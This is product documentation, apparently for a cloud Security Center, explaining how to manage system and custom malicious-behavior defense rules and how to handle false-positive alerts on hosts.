Security Center provides the malicious behavior defense feature. You can enable or disable a system defense rule, manage the servers on which you want the system defense rule to take effect, and configure custom defense rules based on your business requirements. This topic describes how to use the malicious behavior defense feature.

Limits

Only the Advanced, Enterprise, and Ultimate editions of Security Center support this feature. For more information about how to purchase and upgrade Security Center, see Purchase Security Center and Upgrade and downgrade Security Center.

Scenarios

The malicious behavior defense feature supports system defense rules and custom defense rules. The following table describes the scenarios for which the two types of rules are suitable.

Important Custom defense rules have a higher priority than system defense rules.
Rule type Scenario
System defense rule
  • Use system defense rules that are suitable for your business scenarios

    If a system defense rule is not suitable for your business scenarios and affects the security score of your servers, you can disable the rule. For more information, see Manage system defense rules.

  • Handle alert events that are false positives

    If you handle an alert event whose alert type is Precise defense and you determine that the processes detected and reported by Security Center based on a system defense rule are normal processes that are required for your workloads, you can disable the rule on the Host defense rules tab of the Malicious Behavior Defense page. You can also remove the affected servers from the list of servers on which the rule takes effect. For more information, see Handle alert events that are false positives.

Custom defense rule If you want to allow some behavior after you enable or disable a system defense rule, you can create a custom defense rule based on your business requirements.

Manage system defense rules

  1. Log on to the Security Center console. In the left-side navigation pane, choose Protection Configuration > Host Protection > Malicious Behavior Defense.
  2. On the Host defense rules tab, find and manage a system defense rule in the list of system defense rules.

    Search for a system defense rule

    • On the Host defense rules tab, enter the name of the system defense rule in the search box to quickly search for the rule.
    • In the left-side navigation pane of the Host defense rules tab, click a value in the ATT&CK Phase section to filter for the rule.

    Manage a system defense rule

    • Enable or disable the system defense rule
      Important After you disable a system defense rule, Security Center no longer detects risks or triggers alerts based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
      1. Select the system defense rule. You can also select multiple rules based on your business requirements.
      2. In the lower-left corner of the rule list, click Enabled or Deactivation.
    • Manage servers on which the system defense rule tasks effect
      Important After you remove a server from a system defense rule, Security Center no longer detects or reports risks on the server based on the rule. Proceed with caution.
      1. Find the system defense rule that you want to manage and click Management host in the Actions column.
      2. In the Management host panel, add servers to the rule or remove servers from the rule. Then, click OK.

Handle alert events that are false positives

  1. Log on to the Security Center console. In the left-side navigation pane, choose Detection and Response > Alerts.
  2. On the Alerts page, click the number that is displayed below Precise Defense.
  3. In the alert event list, find the alert event that is a false positive and click Details in the Actions column to view the details about the alert event.

    In this example, the alert event that is generated for the alert named Suspicious worm script behavior is handled.

    In the alert details panel, obtain and record the following information for subsequent use.
    • The name of the system defense rule that detects risks. The alert event is generated for the detected risks. In this example, the system defense rule is Suspicious worm script behavior.
    • The value of ATT&CK Phase for the alert event. In this example, the value is Impact.
    • The names and IP addresses of the servers that are affected by the alert event.
  4. In the left-side navigation pane, click Malicious Behavior Defense.
  5. On the Host defense rules tab, search for the system defense rule based on which the alert event is generated.
    • You can enter Suspicious worm script behavior in the search box.
    • You can also click Impact in the ATT&CK Phase section in the left-side navigation pane of the Host defense rules tab.
  6. In the rule list, find and manage the system defense rule Suspicious worm script behavior.
    • If the system defense rule is not suitable for your business scenario and you no longer want Security Center to generate alert events for the risks that are detected by the system defense rule, you can click the Switch icon in the Switch column to disable the rule.
      Important After you disable a system defense rule, Security Center no longer detects risks or generate alert events based on the rule. The alert events that are generated based on the rule are no longer displayed on the Alerts page. Proceed with caution.
    • If you want to handle only an alert event that is a false positive, you can click Management host in the Actions column to remove the servers that are affected from the server list of the rule.

      You can also find and handle an alert event that is a false positive on the Alerts page. For more information, see View and handle alert events.

      Important If you want to handle only an alert event that is generated based on a system defense rule and you want the system defense rule to continue to protect the server on which you handle the alert event, you can add the server to the server list on the Malicious Behavior Defense page after you handle the alert event.

Create a custom defense rule

  1. Log on to the Security Center console. In the left-side navigation pane, choose Protection Configuration > Host Protection > Malicious Behavior Defense.
  2. On the Custom defense rules tab, click New rule.
  3. In the New rule panel, configure the Rule type parameter, the required parameters, and the Action parameter based on your business requirements. Then, click Next.
  4. In the server list of the panel, select the servers on which you want the rule to take effect and click Finish.
    By default, a newly created custom defense rule is enabled. You can modify the rule and manage the servers on which the rule takes effect.